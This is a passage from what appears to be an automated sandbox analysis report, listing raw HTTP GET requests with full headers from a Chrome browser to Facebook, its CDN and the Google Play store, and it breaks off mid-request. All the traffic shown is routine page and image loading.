    Source: global trafficHTTP traffic detected: GET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=1&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqM HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; _js_datr=O934ZvtQ_C-R3ZM0Ae39F-hF; wd=1280x907
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iKIu4/yy/l/ru_RU/lW1EzoN7_Oc.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y2/r/0uUeXNz0Xos.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /data/manifest/ HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://www.facebook.com/?locale=ru_RUAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; _js_datr=O934ZvtQ_C-R3ZM0Ae39F-hF; wd=1280x907
    Source: global trafficHTTP traffic detected: GET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=3&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqM HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; _js_datr=O934ZvtQ_C-R3ZM0Ae39F-hF; wd=1280x907
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y0/r/eFZD1KABzRA.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/user_preferences/ HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y0/r/eFZD1KABzRA.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=4&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqM HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /store/search?q=instagram&c=apps&hl=ru&gl=US HTTP/1.1Host: play.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /CgUPurtUp8SB709wsQcKLMv6JdIh1em0ka_58V69AorznLv42TV39etS2rt28wv9Rz8=w720-h405-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /xNx9CfCzg_VugRMv3rIxVd-GjLRx6_dIXGfTlrKqJwkZCPg_w-ZZNosQT46MYIoo_Q=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /VRMWkE5p3CkWhJs6nv-9ZsLAs1QOg5ob1_3qg-rckwYW7yp1fMrYZqnEFpk0IoVP4LM=s52-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /mw_NfsvKM8m6RPv8Fz2GQawCOsqWv010saMnc7zbWalMxuaA9IY8h7E0VMieLxSxAFB98NFeYqbFrXXq=w48-h16-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /K6kGejYk6GTdg5AenV4A0e-Nc48xjZ_-Qj50IUO5pUCf0V6EpJbeOku4Rk73atcPD4A=w416-h235-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /87mGXAuy0q0oyYxq5DNwHFzCByFtzDjw4clPWAURuOu3kRMcbWlwr0BzNfBNkz2wn2w=w416-h235-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /GeIJA3m3_3mR1kSeB4G0rBs2Lb65AZcwW9HZmlSCFBxqD-BZyY0Q_MSCl_Mcy3-S2RY=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rbz2GOYtKwW-yK99VC_CBSUL_k2PWkkL4NfYubMEmKBCPbGuNxZb_pP7N2WAKZsQUw=w416-h235-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /G6jK9S77RN0laf9_6nhDo3AVxbRP9SgMmt8ZmQjKQ2hibn9xhOY-W5YFn_7stJD1CA=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /d6Y9q1SJXDASeD-93qMXL59Bq_JCd6Bm1cZr_zodlkVnq4ck3TpTWYcMpBwOsUGMQHw=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/webstorage/process_keys/?state=1 HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /mw_NfsvKM8m6RPv8Fz2GQawCOsqWv010saMnc7zbWalMxuaA9IY8h7E0VMieLxSxAFB98NFeYqbFrXXq=w48-h16-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /VRMWkE5p3CkWhJs6nv-9ZsLAs1QOg5ob1_3qg-rckwYW7yp1fMrYZqnEFpk0IoVP4LM=s52-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /CgUPurtUp8SB709wsQcKLMv6JdIh1em0ka_58V69AorznLv42TV39etS2rt28wv9Rz8=w720-h405-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /xNx9CfCzg_VugRMv3rIxVd-GjLRx6_dIXGfTlrKqJwkZCPg_w-ZZNosQT46MYIoo_Q=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /GeIJA3m3_3mR1kSeB4G0rBs2Lb65AZcwW9HZmlSCFBxqD-BZyY0Q_MSCl_Mcy3-S2RY=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /G6jK9S77RN0laf9_6nhDo3AVxbRP9SgMmt8ZmQjKQ2hibn9xhOY-W5YFn_7stJD1CA=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /VRMWkE5p3CkWhJs6nv-9ZsLAs1QOg5ob1_3qg-rckwYW7yp1fMrYZqnEFpk0IoVP4LM=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: 